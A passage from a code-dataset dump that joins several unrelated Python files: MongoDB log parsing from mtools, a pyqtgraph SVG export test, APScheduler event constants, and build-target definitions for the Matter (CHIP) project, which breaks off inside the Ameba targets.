def _check_for_restart(self, logevent):
if (logevent.thread == 'initandlisten' and
"db version v" in logevent.line_str):
self._binary = 'mongod'
elif logevent.thread == 'mongosMain' and ('MongoS' in logevent.line_str or
'mongos' in logevent.line_str):
self._binary = 'mongos'
else:
return False
version = re.search(r'(\d\.\d\.\d+)', logevent.line_str)
if version:
version = version.group(1)
return version
else:
return False
def _calculate_bounds(self):
"""Calculate beginning and end of logfile."""
if self._bounds_calculated:
# Assume no need to recalc bounds for lifetime of a Logfile object
return
if self.from_stdin:
return False
# we should be able to find a valid log line within max_start_lines
max_start_lines = 10
lines_checked = 0
# get start datetime
for line in self.filehandle:
logevent = LogEvent(line)
lines_checked += 1
if logevent.datetime:
self._start = logevent.datetime
self._timezone = logevent.datetime.tzinfo
self._datetime_format = logevent.datetime_format
self._datetime_nextpos = logevent._datetime_nextpos
break
if lines_checked > max_start_lines:
break
# sanity check before attempting to find end date
if (self._start is None):
raise SystemExit("Error: <%s> does not appear to be a supported "
"MongoDB log file format" % self.filehandle.name)
# get end datetime (lines are at most 10k,
# go back 30k at most to make sure we catch one)
self.filehandle.seek(0, 2)
self._filesize = self.filehandle.tell()
self.filehandle.seek(-min(self._filesize, 30000), 2)
for line in reversed(self.filehandle.readlines()):
logevent = LogEvent(line)
if logevent.datetime:
self._end = logevent.datetime
break
# if there was a roll-over, subtract 1 year from start time
if self._end < self._start:
self._start = self._start.replace(year=self._start.year - 1)
self._year_rollover = self._end
else:
self._year_rollover = False
# reset logfile
self.filehandle.seek(0)
self._bounds_calculated = True
return True
def _find_curr_line(self, prev=False):
"""
Internal helper function.
Find the current (or previous if prev=True) line in a log file based on
the current seek position.
"""
curr_pos = self.filehandle.tell()
# jump back 15k characters (at most) and find last newline char
jump_back = min(self.filehandle.tell(), 15000)
self.filehandle.seek(-jump_back, 1)
buff = self.filehandle.read(jump_back)
self.filehandle.seek(curr_pos, 0)
if prev and self.prev_pos is not None and self.prev_pos == curr_pos:
# Number of characters to show before/after the log offset
error_context = 300
self.filehandle.seek(-error_context, 1)
buff = self.filehandle.read(curr_pos)
hr = "-" * 60
print("Fatal log parsing loop detected trying to find previous "
"log line near offset %s in %s:\n\n%s\n%s\n"
"<--- (current log parsing offset) \n%s\n%s\n"
% (curr_pos, self.name, hr, buff[:error_context],
buff[error_context:error_context + 1], hr),
file=sys.stderr)
raise SystemExit("Cannot parse %s with requested options"
% self.filehandle.name)
else:
self.prev_pos = curr_pos
if isinstance(buff, bytes):
buff = buff.decode("utf-8", "replace")
newline_pos = buff.rfind('\n')
if prev:
newline_pos = buff[:newline_pos].rfind('\n')
# move back to last newline char
if newline_pos == -1:
self.filehandle.seek(0)
return self.next()
self.filehandle.seek(newline_pos - jump_back + 1, 1)
# roll forward until we found a line with a datetime
try:
logevent = self.next()
while not logevent.datetime:
logevent = self.next()
return logevent
except StopIteration:
# reached end of file
return None
def _find_sharding_info(self):
"""
Iterate over file and find any sharding related information
"""
self._shards = []
self._chunks_moved_from = []
self._chunks_moved_to = []
self._chunk_splits = []
prev_line = ""
for line in self.filehandle:
if isinstance(line, bytes):
line = line.decode("utf-8", "replace")
if self.binary == "mongos":
if "Starting new replica set monitor for" in line:
if "[mongosMain]" in line:
match = re.search("for (?P<csrsName>\w+)/"
"(?P<replSetMembers>\S+)", line)
if match:
csrs_info = (match.group('csrsName'),
match.group('replSetMembers'))
self._csrs = csrs_info
else:
match = re.search("for (?P<shardName>\w+)/"
"(?P<replSetMembers>\S+)", line)
if match:
shard_info = (match.group('shardName'),
match.group('replSetMembers'))
self._shards.append(shard_info)
elif self.binary == "mongod":
logevent = LogEvent(line)
if "New replica set config in use" in line:
if "configsvr: true" in line:
match = re.search(' _id: "(?P<replSet>\S+)".*'
'members: (?P<replSetMembers>[^]]+ ])', line)
if match:
self._csrs = (
match.group('replSet'),
match.group('replSetMembers')
)
if "Starting new replica set monitor for" in line:
match = re.search("for (?P<replSet>\w+)/"
"(?P<replSetMembers>\S+)", line)
if match:
if self._csrs and match.group('replSet') != self._csrs[0]:
self._shards.append((
match.group('replSet'),
match.group('replSetMembers')
))
elif not self._csrs:
self._csrs = (
match.group('replSet'),
match.group('replSetMembers')
)
if "moveChunk.from" in line:
logevent = LogEvent(line)
match = re.search('ns: "(?P<namespace>\S+)".*'
'details: { (?P<range>.*\}).*'
'to: "(?P<movedTo>\S+)".*note: "(?P<note>\S+)"', line)
if match:
time = logevent.datetime
chunk_range = match.group('range')
namespace = match.group('namespace')
moved_to = match.group('movedTo')
note = match.group('note')
if note == "success":
errmsg = None
steps = re.findall('(?P<steps>step \d of \d): (?P<stepTimes>\d+)', line)
else:
match = re.search(':: caused by :: (?P<errmsg>\S+):', prev_line)
steps = None
if match:
errmsg = match.group('errmsg')
else:
errmsg = "Unknown"
chunk_migration = (time, chunk_range, moved_to, namespace, steps, note, errmsg)
self._chunks_moved_from.append(chunk_migration)
if "moveChunk.to" in line:
logevent = LogEvent(line)
match = re.search('ns: "(?P<namespace>\S+)".*'
'details: { (?P<range>.*\}).*.*note: "(?P<note>\S+)"', line)
if match:
time = logevent.datetime
chunk_range = match.group('range')
namespace = match.group('namespace')
# TODO: alter this to find moved from shard name when SERVER-45770 TICKET is added
moved_from = "Unknown"
note = match.group('note')
if note == "success":
errmsg = None
steps = re.findall('(?P<steps>step \d of \d): (?P<stepTimes>\d+)', line)
else:
steps = None
match = re.search('errmsg: "(?P<errmsg>.*)"', line)
if match:
errmsg = match.group('errmsg')
chunk_migration = (time, chunk_range, moved_from, namespace, steps, note, errmsg)
self._chunks_moved_to.append(chunk_migration)
if "Finding the split vector for" in line:
logevent = LogEvent(line)
match = re.search('for (?P<namespace>\S+).*'
'numSplits: (?P<numSplits>\d+)', line)
if match:
time = logevent.datetime
split_range = None
namespace = match.group("namespace")
numSplits = match.group('numSplits')
success = None
time_taken = 0
error = None
self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))
elif "splitVector" in line:
logevent = LogEvent(line)
match = re.search('splitVector: "(?P<namespace>\S+)".*,'
' (?P<range>min:.*), max.*op_msg (?P<time_taken>\d+)', line)
if match:
time = logevent.datetime
split_range = match.group("range")
namespace = match.group("namespace")
time_taken = match.group("time_taken")
numSplits = 0
success = True
error = None
self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))
elif "Unable to auto-split chunk" in line:
logevent = LogEvent(line)
match = re.search("chunk \[(?P<range>.*)\) "
'in namespace (?P<namespace>\S+)'
' :: caused by :: (?P<error>\S+): ', line)
if match:
time = logevent.datetime
split_range = match.group("range")
namespace = match.group("namespace")
numSplits = 0
success = False
time_taken = 0
error = match.group("error")
self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))
elif "jumbo" in line:
logevent = LogEvent(line)
match = re.search('migration (?P<namespace>\S+): \[(?P<range>.*)\)', prev_line)
if match:
time = logevent.datetime
split_range = match.group("range")
namespace = match.group("namespace")
numSplits = 0
success = False
time_taken = 0
error = "Jumbo"
self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))
prev_line = line
# reset logfile
self.filehandle.seek(0)
def fast_forward(self, start_dt):
"""
Fast-forward file to given start_dt datetime obj using binary search.
Only fast for files. Streams need to be forwarded manually, and it will
miss the first line that would otherwise match (as it consumes the log
line).
"""
if self.from_stdin:
# skip lines until start_dt is reached
return
else:
# fast bisection path
max_mark = self.filesize
step_size = max_mark
# check if start_dt is already smaller than first datetime
self.filehandle.seek(0)
le = self.next()
if le.datetime and le.datetime >= start_dt:
self.filehandle.seek(0)
return
le = None
self.filehandle.seek(0)
# search for lower bound
while abs(step_size) > 100:
step_size = ceil(step_size / 2.)
self.filehandle.seek(step_size, 1)
le = self._find_curr_line()
if not le:
break
if le.datetime >= start_dt:
step_size = -abs(step_size)
else:
step_size = abs(step_size)
if not le:
return
# now walk backwards until we found a truly smaller line
while self.filehandle.tell() >= 2 and (le.datetime is None or
le.datetime >= start_dt):
self.filehandle.seek(-2, 1)
le = self._find_curr_line(prev=True)
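if __name__ == "__main__":
    # Minimal usage sketch added for illustration; it is not part of mtools.
    # "mongod.log" is a hypothetical file name; any MongoDB log file works.
    with open("mongod.log", "rb") as fh:
        logfile = LogFile(fh)
        print("covers %s to %s (%d lines)"
              % (logfile.start, logfile.end, len(logfile)))
        # binary-search ahead to the start datetime, then read one event
        logfile.fast_forward(logfile.start)
        for logevent in logfile:
            print(logevent.line_str)
            break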
| 2.140625 | 2 |
tests/svg.py | Tillsten/pyqtgraph | 0 | 1295 | """
SVG export test
"""
import test
import pyqtgraph as pg
app = pg.mkQApp()
class SVGTest(test.TestCase):
#def test_plotscene(self):
#pg.setConfigOption('foreground', (0,0,0))
#w = pg.GraphicsWindow()
#w.show()
#p1 = w.addPlot()
#p2 = w.addPlot()
#p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'})
#p1.setXRange(0,5)
#p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3})
#app.processEvents()
#app.processEvents()
#ex = pg.exporters.SVGExporter.SVGExporter(w.scene())
#ex.export(fileName='test.svg')
def test_simple(self):
scene = pg.QtGui.QGraphicsScene()
#rect = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100)
#scene.addItem(rect)
#rect.setPos(20,20)
#rect.translate(50, 50)
#rect.rotate(30)
#rect.scale(0.5, 0.5)
#rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100)
#rect1.setParentItem(rect)
#rect1.setFlag(rect1.ItemIgnoresTransformations)
#rect1.setPos(20, 20)
#rect1.scale(2,2)
#el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100)
#el1.setParentItem(rect1)
##grp = pg.ItemGroup()
#grp.setParentItem(rect)
#grp.translate(200,0)
##grp.rotate(30)
#rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 25)
#rect2.setFlag(rect2.ItemClipsChildrenToShape)
#rect2.setParentItem(grp)
#rect2.setPos(0,25)
#rect2.rotate(30)
#el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50)
#el.translate(10,-5)
#el.scale(0.5,2)
#el.setParentItem(rect2)
grp2 = pg.ItemGroup()
scene.addItem(grp2)
grp2.scale(100,100)
rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2)
rect3.setPen(pg.mkPen(width=1, cosmetic=False))
grp2.addItem(rect3)
ex = pg.exporters.SVGExporter.SVGExporter(scene)
ex.export(fileName='test.svg')
if __name__ == '__main__':
test.unittest.main() | 2.5625 | 3 |
src/api/models/enums/apschedulerevents.py | jedicontributors/pythondataintegrator | 14 | 1296 | <gh_stars>10-100
EVENT_SCHEDULER_STARTED = EVENT_SCHEDULER_START = 2 ** 0
EVENT_SCHEDULER_SHUTDOWN = 2 ** 1
EVENT_SCHEDULER_PAUSED = 2 ** 2
EVENT_SCHEDULER_RESUMED = 2 ** 3
EVENT_EXECUTOR_ADDED = 2 ** 4
EVENT_EXECUTOR_REMOVED = 2 ** 5
EVENT_JOBSTORE_ADDED = 2 ** 6
EVENT_JOBSTORE_REMOVED = 2 ** 7
EVENT_ALL_JOBS_REMOVED = 2 ** 8
EVENT_JOB_ADDED = 2 ** 9
EVENT_JOB_REMOVED = 2 ** 10
EVENT_JOB_MODIFIED = 2 ** 11
EVENT_JOB_EXECUTED = 2 ** 12
EVENT_JOB_ERROR = 2 ** 13
EVENT_JOB_MISSED = 2 ** 14
EVENT_JOB_SUBMITTED = 2 ** 15
EVENT_JOB_MAX_INSTANCES = 2 ** 16
EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED |
EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED |
EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED |
EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED |
EVENT_JOB_ERROR | EVENT_JOB_MISSED | EVENT_JOB_SUBMITTED | EVENT_JOB_MAX_INSTANCES) | 1.164063 | 1 |
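# ---------------------------------------------------------------------------
# Illustration added for clarity; it is not part of the original module.
# The constants are bit flags, so a listener mask is built with bitwise OR
# and an incoming event code is tested with bitwise AND.
# ---------------------------------------------------------------------------
# mask = EVENT_JOB_EXECUTED | EVENT_JOB_ERROR
# assert mask & EVENT_JOB_ERROR
# assert not mask & EVENT_JOB_MISSED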
scripts/build/build/targets.py | mrninhvn/matter | 2 | 1297 | <filename>scripts/build/build/targets.py
# Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from itertools import combinations
from typing import List
from builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder
from builders.android import AndroidApp, AndroidBoard, AndroidBuilder
from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder
from builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder
from builders.efr32 import Efr32App, Efr32Board, Efr32Builder
from builders.esp32 import Esp32App, Esp32Board, Esp32Builder
from builders.host import HostApp, HostBoard, HostBuilder
from builders.infineon import InfineonApp, InfineonBoard, InfineonBuilder
from builders.k32w import K32WApp, K32WBuilder
from builders.mbed import MbedApp, MbedBoard, MbedBuilder, MbedProfile
from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder
from builders.qpg import QpgApp, QpgBoard, QpgBuilder
from builders.telink import TelinkApp, TelinkBoard, TelinkBuilder
from builders.tizen import TizenApp, TizenBoard, TizenBuilder
from builders.bl602 import Bl602App, Bl602Board, Bl602Builder
from builders.imx import IMXApp, IMXBuilder
class Target:
"""Represents a build target:
Has a name identifier plus parameters on how to build it (what
builder class to use and what arguments are required to produce
the specified build)
"""
def __init__(self, name, builder_class, **kwargs):
self.name = name
self.builder_class = builder_class
self.glob_blacklist_reason = None
self.create_kw_args = kwargs
def Clone(self):
"""Creates a clone of self."""
clone = Target(self.name, self.builder_class,
**self.create_kw_args.copy())
clone.glob_blacklist_reason = self.glob_blacklist_reason
return clone
def Extend(self, suffix, **kargs):
"""Creates a clone of the current object extending its build parameters.
Arguments:
suffix: appended with a "-" as separator to the clone name
**kargs: arguments needed to produce the new build variant
"""
clone = self.Clone()
clone.name += "-" + suffix
clone.create_kw_args.update(kargs)
return clone
def Create(self, runner, repository_path: str, output_prefix: str,
enable_flashbundle: bool):
builder = self.builder_class(
repository_path, runner=runner, **self.create_kw_args)
builder.target = self
builder.identifier = self.name
builder.output_dir = os.path.join(output_prefix, self.name)
builder.enable_flashbundle(enable_flashbundle)
return builder
def GlobBlacklist(self, reason):
clone = self.Clone()
if clone.glob_blacklist_reason:
clone.glob_blacklist_reason += ", "
clone.glob_blacklist_reason += reason
else:
clone.glob_blacklist_reason = reason
return clone
@property
def IsGlobBlacklisted(self):
return self.glob_blacklist_reason is not None
@property
def GlobBlacklistReason(self):
return self.glob_blacklist_reason
class AcceptAnyName:
def Accept(self, name: str):
return True
class AcceptNameWithSubstrings:
def __init__(self, substr: List[str]):
self.substr = substr
def Accept(self, name: str):
for s in self.substr:
if s in name:
return True
return False
class BuildVariant:
def __init__(self, name: str, validator=AcceptAnyName(),
conflicts: List[str] = [], requires: List[str] = [],
**buildargs):
self.name = name
self.validator = validator
self.conflicts = conflicts
self.buildargs = buildargs
self.requires = requires
def HasConflicts(items: List[BuildVariant]) -> bool:
for a, b in combinations(items, 2):
if (a.name in b.conflicts) or (b.name in a.conflicts):
return True
return False
def AllRequirementsMet(items: List[BuildVariant]) -> bool:
"""
Check that item.requires is satisfied for all items in the given list
"""
available = set([item.name for item in items])
for item in items:
for requirement in item.requires:
if requirement not in available:
return False
return True
class VariantBuilder:
"""Handles creating multiple build variants based on a starting target.
"""
def __init__(self, targets: List[Target] = []):
# note the clone in case the default arg is used
self.targets = targets[:]
self.variants = []
self.glob_whitelist = []
def WhitelistVariantNameForGlob(self, name):
"""
Whitelist the specified variant to be allowed for globbing.
By default we do not want a 'build all' to select all variants, so
variants are generally glob-blacklisted.
"""
self.glob_whitelist.append(name)
def AppendVariant(self, **args):
"""
Add another variant to the accepted variants. Arguments are the
constructor arguments of BuildVariant.
Example usage:
builder.AppendVariant(name="ipv6only", enable_ipv4=False)
"""
self.variants.append(BuildVariant(**args))
def AllVariants(self):
"""
Yields a list of acceptable variants for the given targets.
Handles conflict resolution between build variants and globbing
whitelist targets.
"""
for target in self.targets:
yield target
# skip variants that do not work for this target
ok_variants = [
v for v in self.variants if v.validator.Accept(target.name)]
# Build every possible variant
for variant_count in range(1, len(ok_variants) + 1):
for subgroup in combinations(ok_variants, variant_count):
if HasConflicts(subgroup):
continue
if not AllRequirementsMet(subgroup):
continue
# Target ready to be created - no conflicts
variant_target = target.Clone()
for option in subgroup:
variant_target = variant_target.Extend(
option.name, **option.buildargs)
# Only a few are whitelisted for globs
name = '-'.join([o.name for o in subgroup])
if name not in self.glob_whitelist:
if not variant_target.IsGlobBlacklisted:
variant_target = variant_target.GlobBlacklist(
'Reduce default build variants')
yield variant_target
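# ---------------------------------------------------------------------------
# Illustration added for clarity; it is not part of the original script.
# Given a hypothetical target "linux-x64-light" and two variants "ipv6only"
# and "no-ble", AllVariants() yields the base target plus every
# non-conflicting combination:
#   linux-x64-light
#   linux-x64-light-ipv6only
#   linux-x64-light-no-ble
#   linux-x64-light-ipv6only-no-ble
# Combinations whose joined name is not glob-whitelisted are marked
# GlobBlacklisted so that a "build all" run stays small.
# ---------------------------------------------------------------------------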
def HostTargets():
target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder)
target_native = target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE)
targets = [target_native]
# x64 linux supports cross compile
cross_compile = (HostBoard.NATIVE.PlatformName() == 'linux') and (HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName())
if cross_compile:
targets.append(target.Extend('arm64', board=HostBoard.ARM64))
app_targets = []
# Don't cross compile some builds
app_targets.append(
target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE))
app_targets.append(
target_native.Extend('tv-app', app=HostApp.TV_APP))
app_targets.append(
target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP))
app_targets.append(
target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER))
for target in targets:
app_targets.append(target.Extend(
'all-clusters', app=HostApp.ALL_CLUSTERS))
if (HostBoard.NATIVE.PlatformName() == 'darwin'):
app_targets.append(target.Extend(
'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN))
app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL))
app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT))
app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS))
app_targets.append(target.Extend('light', app=HostApp.LIGHT))
app_targets.append(target.Extend('lock', app=HostApp.LOCK))
app_targets.append(target.Extend('shell', app=HostApp.SHELL))
app_targets.append(target.Extend(
'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False))
app_targets.append(target.Extend(
'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False))
app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS))
builder = VariantBuilder()
# Possible build variants. Note that number of potential
# builds is exponential here
builder.AppendVariant(name="same-event-loop", validator=AcceptNameWithSubstrings(
['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False),
builder.AppendVariant(name="no-interactive", validator=AcceptNameWithSubstrings(
['-chip-tool']), interactive_mode=False),
builder.AppendVariant(name="ipv6only", enable_ipv4=False),
builder.AppendVariant(name="no-ble", enable_ble=False),
builder.AppendVariant(name="no-wifi", enable_wifi=False),
builder.AppendVariant(name="tsan", conflicts=['asan'], use_tsan=True),
builder.AppendVariant(name="asan", conflicts=['tsan'], use_asan=True),
builder.AppendVariant(name="libfuzzer", requires=[
"clang"], use_libfuzzer=True),
builder.AppendVariant(name="clang", use_clang=True),
builder.AppendVariant(name="test", extra_tests=True),
builder.WhitelistVariantNameForGlob('no-interactive-ipv6only')
builder.WhitelistVariantNameForGlob('ipv6only')

    for target in app_targets:
        if ('-rpc-console' in target.name) or ('-python-bindings' in target.name) or ('nl-test-runner' in target.name):
            # Single-variant builds
            yield target
        else:
            builder.targets.append(target)

    for target in builder.AllVariants():
        if cross_compile and 'chip-tool' in target.name and 'arm64' in target.name and '-no-interactive' not in target.name:
            # Interactive builds will not compile by default on arm cross compiles
            # because libreadline is not part of the default sysroot
            yield target.GlobBlacklist('Arm crosscompile does not support libreadline-dev')
        else:
            yield target

    # Without extra build variants
    yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL)
    yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE)
    yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE,
                               use_clang=True).GlobBlacklist("Reduce default build variants")
    yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE,
                               use_platform_mdns=True).GlobBlacklist("Reduce default build variants")
    yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE,
                               use_platform_mdns=True, enable_ipv4=False).GlobBlacklist("Reduce default build variants")

    test_target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder)
    for board in [HostBoard.NATIVE, HostBoard.FAKE]:
        yield test_target.Extend(board.BoardName() + '-tests', board=board, app=HostApp.TESTS)


def Esp32Targets():
    esp32_target = Target('esp32', Esp32Builder)

    yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS)
    yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS,
                              enable_ipv4=False)
    yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS,
                              enable_rpcs=True)
    yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS,
                              enable_rpcs=True, enable_ipv4=False)

    yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS)

    devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC)

    yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS)
    yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False)
    yield devkitc.Extend('shell', app=Esp32App.SHELL)
    yield devkitc.Extend('light', app=Esp32App.LIGHT)
    yield devkitc.Extend('lock', app=Esp32App.LOCK)
    yield devkitc.Extend('bridge', app=Esp32App.BRIDGE)
    yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT)
    yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True)

    yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS)


def Efr32Targets():
    efr_target = Target('efr32', Efr32Builder)

    board_targets = [
        efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A),
        efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist(
            'only user requested'),
        efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist(
            'only user requested'),
        efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist(
            'only user requested'),
        efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist(
            'only user requested'),
        efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist(
            'only user requested'),
        efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist(
            'only user requested'),
        efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist(
            'only user requested')
    ]

    builder = VariantBuilder()

    for board_target in board_targets:
        builder.targets.append(board_target.Extend(
            'window-covering', app=Efr32App.WINDOW_COVERING))
        builder.targets.append(board_target.Extend(
            'switch', app=Efr32App.SWITCH))
        builder.targets.append(board_target.Extend(
            'unit-test', app=Efr32App.UNIT_TEST))
        builder.targets.append(
            board_target.Extend('light', app=Efr32App.LIGHT))
        builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK))

    # Possible build variants. Note that number of potential
    # builds is exponential here
    builder.AppendVariant(name="rpc", validator=AcceptNameWithSubstrings(
        ['-light', '-lock']), enable_rpcs=True)
    builder.AppendVariant(name="with-ota-requestor", enable_ota_requestor=True)

    builder.WhitelistVariantNameForGlob('rpc')

    for target in builder.AllVariants():
        yield target


def NrfTargets():
    target = Target('nrf', NrfConnectBuilder)

    yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS)

    targets = [
        target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK),
        target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK),
    ]

    # Enable nrf52840dongle for all-clusters and lighting app only
    yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS)
    yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT)

    for target in targets:
        yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS)
        yield target.Extend('lock', app=NrfApp.LOCK)
        yield target.Extend('light', app=NrfApp.LIGHT)
        yield target.Extend('shell', app=NrfApp.SHELL)
        yield target.Extend('pump', app=NrfApp.PUMP)
        yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER)

        rpc = target.Extend('light-rpc', app=NrfApp.LIGHT, enable_rpcs=True)

        if '-nrf5340dk-' in rpc.name:
            rpc = rpc.GlobBlacklist(
                'Compile failure due to pw_build args not forwarded to proto compiler. '
                'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760')

        yield rpc


def AndroidTargets():
    target = Target('android', AndroidBuilder)

    yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST)
    yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer)
    yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer)
    yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer)
    yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer)
    yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP)
    yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP)


def MbedTargets():
    target = Target('mbed', MbedBuilder)

    targets = [
        target.Extend('CY8CPROTO_062_4343W',
                      board=MbedBoard.CY8CPROTO_062_4343W),
    ]

    app_targets = []
    for target in targets:
        app_targets.append(target.Extend('lock', app=MbedApp.LOCK))
        app_targets.append(target.Extend('light', app=MbedApp.LIGHT))
        app_targets.append(target.Extend(
            'all-clusters', app=MbedApp.ALL_CLUSTERS))
        app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED))
        app_targets.append(target.Extend('shell', app=MbedApp.SHELL))

    for target in app_targets:
        yield target.Extend('release', profile=MbedProfile.RELEASE)
        yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist(
            'Compile only for debugging purpose - '
            'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html')
        yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist(
            'Compile only for debugging purpose - '
            'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html')


def InfineonTargets():
    target = Target('infineon', InfineonBuilder)

    yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK)
    yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS)
    yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT)


def AmebaTargets():
    ameba_target = Target('ameba', AmebaBuilder)

